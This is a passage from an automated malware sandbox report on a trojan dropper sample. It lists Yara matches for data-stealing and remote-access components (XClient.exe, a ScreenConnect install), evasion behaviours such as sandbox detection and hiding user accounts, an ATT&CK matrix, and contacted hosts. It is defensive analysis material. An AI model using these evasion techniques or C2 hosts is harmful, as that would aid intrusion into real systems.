                        Source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.drBinary or memory string: Progman
                        Source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

                        Language, Device and Operating System Detection

                        barindex
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_055C06B4 CreateNamedPipeW,9_2_055C06B4
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_01184C67 RtlGetVersion,9_2_01184C67
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                        Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                        Source: svchost.exe, 00000014.00000002.2474733015.000001D4F0B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: svchost.exe, 00000014.00000002.2474733015.000001D4F0B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.14.drBinary or memory string: MsMpEng.exe
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6468, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6468, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6468, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6468, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: 16.2.ScreenConnect.WindowsClient.exe.31efa18.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.ScreenConnect.WindowsClient.exe.d70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.ScreenConnect.WindowsClient.exe.27dfa50.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7032, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7560, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Config.Msi\4e450d.rbs, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Installer\MSI473E.tmp, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Replication Through Removable Media
                        41
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        31
                        Disable or Modify Tools
                        OS Credential Dumping11
                        Peripheral Device Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        Component Object Model Hijacking
                        1
                        Component Object Model Hijacking
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory1
                        File and Directory Discovery
                        Remote Desktop ProtocolData from Removable Media2
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Command and Scripting Interpreter
                        2
                        Windows Service
                        2
                        Windows Service
                        11
                        Obfuscated Files or Information
                        Security Account Manager55
                        System Information Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        13
                        Process Injection
                        2
                        Software Packing
                        NTDS381
                        Security Software Discovery
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd1
                        Bootkit
                        1
                        Scheduled Task/Job
                        1
                        Timestomp
                        LSA Secrets2
                        Process Discovery
                        SSHKeylogging12
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials81
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        File Deletion
                        DCSync1
                        System Network Configuration Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                        Masquerading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt81
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                        Process Injection
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Hidden Users
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Bootkit
                        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                        Rundll32
                        GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1663991 Sample: SecuriteInfo.com.Trojan.Mul... Startdate: 13/04/2025 Architecture: WINDOWS Score: 100 70 mail.cloudhelpdesk.cloud 2->70 72 ip-api.com 2->72 74 bg.microsoft.map.fastly.net 2->74 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 15 other signatures 2->86 8 msiexec.exe 94 51 2->8         started        12 SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe 4 4 2->12         started        14 ScreenConnect.ClientService.exe 2 5 2->14         started        17 7 other processes 2->17 signatures3 process4 dnsIp5 48 C:\Windows\Installer\MSI49E0.tmp, PE32 8->48 dropped 50 C:\Windows\Installer\MSI475F.tmp, PE32 8->50 dropped 52 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 8->52 dropped 58 10 other malicious files 8->58 dropped 88 Enables network access during safeboot for specific services 8->88 90 Modifies security policies related information 8->90 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        54 C:\Users\user\AppData\Roaming\XClient.exe, PE32 12->54 dropped 56 SecuriteInfo.com.T...16409.10206.exe.log, CSV 12->56 dropped 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->92 94 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 12->94 25 XClient.exe 14 2 12->25         started        29 msiexec.exe 6 12->29         started        78 mail.cloudhelpdesk.cloud 103.195.101.204, 49688, 8041 RELIABLESITEUS Singapore 14->78 96 Reads the Security eventlog 14->96 98 Reads the System eventlog 14->98 32 ScreenConnect.WindowsClient.exe 14->32         started        34 ScreenConnect.WindowsClient.exe 14->34         started        100 Changes security center settings (notifications, updates, antivirus, firewall) 17->100 36 MpCmdRun.exe 17->36         started        38 WerFault.exe 17->38         started        file6 signatures7 process8 dnsIp9 40 rundll32.exe 11 19->40         started        76 ip-api.com 208.95.112.1, 49687, 80 TUT-ASUS United States 25->76 104 Antivirus detection for dropped file 25->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->106 108 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 25->108 44 WerFault.exe 25->44         started        68 C:\Users\user\AppData\Local\...\MSI41FF.tmp, PE32 29->68 dropped 110 Creates files in the system32 config directory 32->110 112 Contains functionality to hide user accounts 32->112 46 conhost.exe 36->46         started        file10 signatures11 process12 file13 60 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 40->60 dropped 62 C:\...\ScreenConnect.InstallerActions.dll, PE32 40->62 dropped 64 C:\Users\user\...\ScreenConnect.Core.dll, PE32 40->64 dropped 66 4 other malicious files 40->66 dropped 102 Contains functionality to hide user accounts 40->102 signatures14

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.